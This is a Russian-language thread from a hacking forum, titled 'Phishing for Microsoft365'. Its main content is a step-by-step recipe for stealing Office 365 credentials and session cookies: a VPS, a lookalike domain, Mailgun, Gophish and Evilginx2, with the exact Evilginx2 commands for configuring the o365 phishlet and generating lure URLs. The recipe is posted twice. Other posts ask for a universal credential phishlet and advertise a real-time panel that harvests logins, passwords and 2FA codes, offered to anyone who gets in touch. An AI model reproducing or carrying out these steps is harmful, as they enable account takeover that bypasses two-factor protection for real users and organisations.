• XSS.stack #1 – первый литературный журнал от юзеров форума

Фишинг под Microsoft365

Скрытый контент для пользователей: hackerman_228, Simba.
 
Последнее редактирование:
А может не будете мертвые темы апать клоуны?
Серьезный ты наш Хокаге, иди дом стереги...
 

Вложения

  • Screenshot_2021-08-08-21-13-10-1.png
    Screenshot_2021-08-08-21-13-10-1.png
    106 КБ · Просмотры: 82
Относительно дешевый способ)

1. Покупаете VPS;
2. Покупаете домен с хостингом (в записи DNS добавляете subdomains microsoft);
3. Идете на mailgun и верифицируете там свой домен (для отправки писем);
4. На VPS ставите Gophish (для отправки писем) и Evilgnix2 (для перехвата данных и кукис);
5. Поднимаете Gophish;
6. Поднимаете Evilgnix2:
: config domain phishdomain.com; - конфигурация вашего домена
: config ip 'your hosts's ip'; - конфигурация вашего VPS (где запущен Evilgnix2)
: phishlets hostname o365 microsoft.phishdomain.com; - прикручивание фишлета o365 к вашему домену
: phishlets enable o365; - включение фишлета
: lures create o365;
: lures get-url 1(or other ID);
 
Here's a video course of pretty much what he just explained above. This is not my channel and I don't vouch for him in any way, I just remembered getting this a little while ago and thought it could help people here

 
Относительно дешевый способ)

1. Покупаете VPS;
2. Покупаете домен с хостингом (в записи DNS добавляете subdomains microsoft);
3. Идете на mailgun и верифицируете там свой домен (для отправки писем);
4. На VPS ставите Gophish (для отправки писем) и Evilgnix2 (для перехвата данных и кукис);
5. Поднимаете Gophish;
6. Поднимаете Evilgnix2:
: config domain phishdomain.com; - конфигурация вашего домена
: config ip 'your hosts's ip'; - конфигурация вашего VPS (где запущен Evilgnix2)
: phishlets hostname o365 microsoft.phishdomain.com; - прикручивание фишлета o365 к вашему домену
: phishlets enable o365; - включение фишлета
: lures create o365;
: lures get-url 1(or other ID);
А есть ли фишлет универсальный под перехват $username $password ??
 
Есть реалтайм панель для 365, собирает логин пасс 2фа, юзер инфо.
GIF: https://s6.gifyu.com/images/365.gif

Если нужно обращайтесь.
 

Полный мануал с установкой o365 evilginx2
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх